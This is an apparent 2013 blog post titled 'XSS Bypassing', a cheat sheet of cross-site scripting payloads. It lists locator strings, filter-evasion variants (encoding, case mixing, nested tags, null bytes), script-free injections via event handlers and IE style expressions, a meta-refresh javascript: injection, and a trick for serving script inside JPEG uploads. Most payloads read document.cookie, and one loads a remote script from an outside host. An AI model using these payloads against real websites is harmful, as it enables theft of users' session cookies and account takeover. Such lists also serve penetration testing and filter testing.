http://skamason.com/7b9R

http://skamason.com/7b9R

sábado, 23 de fevereiro de 2013

XSS Bypassing

    XSS Locators:
           
    XSS<-->/\'="
     
    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
     
    '';!--"<XSS>=&{()}
     
     
     
    The ol’e basic:
     
    “><script >alert(document.cookie)</script>
     
    Bypass filter when it strips <script> tags:
     
    %253cscript%253ealert(document.cookie)%253c/script%253e
     
    “><s”%2b”cript>alert(document.cookie)</script>
     
    “><ScRiPt>alert(document.cookie)</script>
     
    “><<script>alert(document.cookie);//<</script>
     
    foo%00<script>alert(document.cookie)</script>
     
    <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
     
    %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
     
    When inside <script> tags:
     
    ‘; alert(document.cookie); var foo=’
     
    foo\’; alert(document.cookie);//’;
     
    </script><script >alert(document.cookie)</script>
     
    Other XSS that don’t require <script>:
     
    <img src=asdf onerror=alert(document.cookie)>
     
    <BODY ONLOAD=alert(’XSS’)>
     
    On IE, many tags will accept a style attribute that one could do things with:
     
    http://www.site.com?image=s%22%20style=x:expression(alert(document.cookie))
     
    http://www.site.com?image=s%22%20style=%22background:url(javascript:alert(’XSS’))
     
    http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29
     
    In FF if you control the content attribute of a refresh meta tag, you can inject a URL that uses the javascript: protocol:
     
    http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>
     
    XSS in JPEGs:
     
    Don’t forget if a user requests a JPEG file in IE directly (not through an embedded <img> tag), then IE will process the contents as HTML if that is what the JPEG contains. This means that we can upload a file with a .jpg extension containing a XSS payload. This works nicely when we have an application that has functionality to upload images and then gets viewed by others. This is common in web mail applications, where one can send an email containing an image attachment, etc. Many applications sanitize HTML attachments to block XSS attacks, but overlook the way IE handles JPEG files.
     
    Example:
     
    HTTP/1.1 200 OK
     
    Date: Sun, 6 May 2007 11:32:35 GMT
     
    Server: Apache
     
    Content-Length: 39
     
    Content-Type: image/jpeg
     
    <script>alert(document.cookie)</script>
Postado por às
Marcadores:

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)